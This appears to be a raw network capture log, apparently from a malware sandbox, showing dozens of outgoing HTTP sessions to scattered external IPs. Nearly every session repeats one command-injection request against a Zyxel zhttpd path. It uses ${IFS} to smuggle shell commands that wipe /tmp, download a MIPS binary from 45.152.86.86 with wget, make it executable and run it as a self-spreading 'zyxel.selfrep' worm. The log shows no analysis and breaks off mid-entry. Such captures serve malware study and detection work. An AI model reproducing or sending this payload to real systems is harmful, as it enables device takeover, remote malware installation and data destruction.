                                        Mar 31, 2024 09:22:04.439033031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6819192.168.2.234114835.121.124.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439078093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6820192.168.2.2342570221.34.116.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439126968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6821192.168.2.234674271.170.28.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439171076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6822192.168.2.23550144.178.130.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439220905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6823192.168.2.2353278191.189.154.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439271927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6824192.168.2.233500814.92.158.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439321995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6825192.168.2.2336842173.2.249.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439377069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6826192.168.2.235200623.164.69.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439408064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6827192.168.2.2336736157.91.185.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439440012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6828192.168.2.2344086144.232.129.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439497948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6829192.168.2.235485889.5.61.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439555883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6830192.168.2.234443420.111.8.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439601898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6831192.168.2.2338644173.49.98.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439634085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6832192.168.2.234317669.111.139.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439703941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6833192.168.2.2354624182.224.20.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439754963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6834192.168.2.2353718156.28.49.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439785957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6835192.168.2.233927632.34.61.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439825058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6836192.168.2.235933251.1.88.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439877987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6837192.168.2.233294261.23.136.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439941883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6838192.168.2.2334912163.9.31.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.439980030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6839192.168.2.233475452.8.160.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440028906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6840192.168.2.235553081.103.158.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440074921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6841192.168.2.2358074106.107.9.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440121889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6842192.168.2.2350622110.190.90.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440175056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6843192.168.2.2347710170.184.11.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440231085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6844192.168.2.233740019.138.190.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440267086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6845192.168.2.233453085.193.91.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440325022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6846192.168.2.2358944146.135.117.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440373898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6847192.168.2.2350920194.97.60.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440424919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6848192.168.2.2351414135.175.30.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440473080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6849192.168.2.2333504123.35.19.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440530062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6850192.168.2.2353954154.27.45.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440581083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6851192.168.2.2351368185.168.155.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440629959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6852192.168.2.2333562221.38.105.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440680981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6853192.168.2.233443260.135.217.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440721989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6854192.168.2.234327048.98.70.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440768957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6855192.168.2.2355448212.100.117.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440815926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6856192.168.2.2338980203.125.0.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440865040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6857192.168.2.2346908213.138.17.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440911055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6858192.168.2.235425025.244.143.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.440974951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6859192.168.2.235494213.168.114.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441026926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6860192.168.2.2333058209.153.218.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441056967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6861192.168.2.234235848.100.192.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441107035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6862192.168.2.2356374102.26.125.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441163063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6863192.168.2.2356608213.150.13.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441200972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6864192.168.2.2356756157.24.124.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441250086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6865192.168.2.2343036146.100.243.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441302061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6866192.168.2.234811412.220.144.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441355944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6867192.168.2.2354492117.171.58.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441399097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6868192.168.2.2334604126.241.52.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441453934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6869192.168.2.2357014222.45.109.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441488028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6870192.168.2.233534299.69.180.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441548109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6871192.168.2.2352962143.95.29.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441601038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6872192.168.2.2360576126.221.245.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441638947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6873192.168.2.2340432141.22.133.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441694021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6874192.168.2.2339302140.20.91.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441725969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6875192.168.2.23506188.250.20.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441773891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6876192.168.2.2339654191.153.55.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441834927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6877192.168.2.234723812.206.203.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441875935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6878192.168.2.2335198124.237.174.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.441940069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6879192.168.2.2343236157.187.113.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442006111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6880192.168.2.2351158178.112.77.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442049026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6881192.168.2.235314681.141.91.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442132950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6882192.168.2.2358834134.183.29.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442164898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6883192.168.2.234581692.183.2.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442195892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6884192.168.2.235111012.23.217.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442255020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6885192.168.2.233686891.39.6.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442307949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6886192.168.2.2338928155.164.199.198443
                                        TimestampBytes transferredDirectionData
